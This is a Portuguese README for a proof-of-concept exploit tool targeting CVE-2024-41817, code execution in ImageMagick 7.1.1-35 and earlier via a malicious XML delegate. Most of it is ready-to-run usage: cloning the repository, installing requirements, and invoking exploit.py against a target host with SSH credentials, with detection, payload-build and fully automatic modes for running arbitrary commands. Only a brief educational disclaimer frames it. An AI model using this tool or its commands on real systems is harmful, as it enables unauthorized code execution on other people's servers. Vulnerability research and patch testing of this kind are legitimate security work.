
CVE-2024-41817 POC ImageMagick <= 7.1.1-35 Execução de Código Arbitrário
Prova de conceito (PoC) de exploit para versões do ImageMagick <= 7.1.1-35 que permite execução arbitrária de código por meio de delegação XML maliciosa.
Este exploit aproveita uma vulnerabilidade no ImageMagick que permite execução arbitrária de código por meio de bibliotecas especialmente criadas. O script pode:
git clone https://github.com/Dxsk/CVE-2024-41817-poc/
cd CVE-2024-41817-poc
pip install -r requirements.txt
python3 exploit.py -H <target> -p <port> -u <user> -P <password> -d
python3 exploit.py -c "command" -B
python3 exploit.py -c "command" -H <target> -p <port> -u <user> -P <password> -A
-c, --command: Comando a executar (padrão: "id")-H, --host: Host alvo-p, --port: Porta SSH (padrão: 22)-u, --username: Usuário SSH-P, --password: Senha SSH-d, --detection: Detectar automaticamente se o ImageMagick é vulnerável-B, --build: Apenas gerar o payload-A, --auto: Modo totalmente automático-v, --verbose: Saída detalhadaEsta ferramenta é apenas para fins educacionais. Utilize-a somente contra sistemas em que você tenha permissão para testar.